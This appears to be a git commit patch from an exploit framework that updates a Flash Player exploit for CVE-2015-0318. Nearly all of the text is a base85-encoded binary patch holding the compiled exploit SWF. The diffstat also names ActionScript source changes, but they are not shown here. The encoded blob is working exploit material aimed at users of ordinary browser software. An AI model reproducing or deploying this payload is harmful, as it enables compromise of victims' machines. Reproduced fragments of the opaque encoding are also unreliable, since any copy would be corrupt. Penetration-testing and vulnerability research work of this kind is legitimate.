From 0c3329f69ee6753608ddb7f17cf8e337b4f7bf49 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 12 Mar 2015 15:26:55 -0500 Subject: [PATCH] Back on track --- data/exploits/CVE-2015-0318/Main.swf | Bin 5459 -> 20610 bytes .../source/exploits/CVE-2015-0318/Main.as | 75 ++++++++---------- 2 files changed, 33 insertions(+), 42 deletions(-) diff --git a/data/exploits/CVE-2015-0318/Main.swf b/data/exploits/CVE-2015-0318/Main.swf index 69d3b7a8dde369e0794cae93d3118b3b42c337eb..687ad265566d2a5cecdfa3411288d8f814f72ece 100755 GIT binary patch literal 20610 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 